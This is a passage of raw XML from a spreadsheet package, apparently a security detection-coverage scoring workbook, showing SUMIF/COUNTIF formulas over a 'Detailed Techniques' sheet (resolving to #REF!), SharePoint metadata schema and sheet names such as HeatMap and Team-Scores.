        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D11" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E11" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F11" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G11" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H11" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
  </sheetData>
  <customSheetViews>
    <customSheetView guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" scale="90" showGridLines="0" topLeftCell="A11">
      <selection activeCell="A6" sqref="A6"/>
      <pageMargins left="0" right="0" top="0" bottom="0" header="0" footer="0"/>
    </customSheetView>
  </customSheetView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9513BD1345DB45A1EDB2A3A46C0A75" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="ecd853290d805116e4dcb85a5d916ed2">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b0bbd386-cac4-41ca-a48f-4911721e17dc" xmlns:ns3="086ed86e-66c6-45d0-9b28-10e700cd4927" xmlns:ns4="7e3823bb-9519-4c7b-9708-f192af7b5294" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a7acbd58ad08f0dd6be338632e8ce132" ns2:_="" ns3:_="" ns4:_="">
    <xsd:import namespace="b0bbd386-cac4-41ca-a48f-4911721e17dc"/>
    <xsd:import namespace="086ed86e-66c6-45d0-9b28-10e700cd4927"/>
    <xsd:import namespace="7e3823bb-9519-4c7b-9708-f192af7b5294"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:SharedWithUsers" minOccurs="0"/>
                <xsd:element ref="ns3:SharedWithDetails" minOccurs="0"/>
                <xsd:element ref="ns3:LastSharedByUser" minOccurs="0"/>
                <xsd:element ref="ns3:LastSharedByTime"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EventHashCode" minOccurs="0"/>
                <xsd:element ref="ns4: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bbd386-cac4-41ca-a48f-4911721e17d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86ed86e-66c6-45d0-9b28-10e700cd4927" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>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e3823bb-9519-4c7b-9708-f192af7b5294"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76E332-1088-41B6-9B82-C985E8162554}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="086ed86e-66c6-45d0-9b28-10e700cd4927"/>
    <ds:schemaRef ds:uri="7e3823bb-9519-4c7b-9708-f192af7b5294"/>
    <ds:schemaRef ds:uri="b0bbd386-cac4-41ca-a48f-4911721e17dc"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7B243194-834A-445F-BF3F-6EC4A1CF7D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bbd386-cac4-41ca-a48f-4911721e17dc"/>
    <ds:schemaRef ds:uri="086ed86e-66c6-45d0-9b28-10e700cd4927"/>
    <ds:schemaRef ds:uri="7e3823bb-9519-4c7b-9708-f192af7b52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2336BE-693D-456F-9E77-8C240397380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HeatMap</vt:lpstr>
      <vt:lpstr>Score Defs</vt:lpstr>
      <vt:lpstr>Trends</vt:lpstr>
      <vt:lpstr>Detailed Techniques</vt:lpstr>
      <vt:lpstr>DataQuality-Scores</vt:lpstr>
      <vt:lpstr>Team-Scores</vt:lpstr>
      <vt:lpstr>DataSource-Tool-Coverage</vt:lpstr>
      <vt:lpstr>DS-Tool-Coverage-Histogram</vt:lpstr>
      <vt:lpstr>DS-Tool-Tactic-Coverage</vt:lpstr>
      <vt:lpstr>Security_Tools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wardog</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Matthew Saltzman</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-16T02:18:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-02T15:58:21Z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0x010100799513BD1345DB45A1EDB2A3A46C0A75</vt:lpwstr>
  </property>
</Properties>
</file>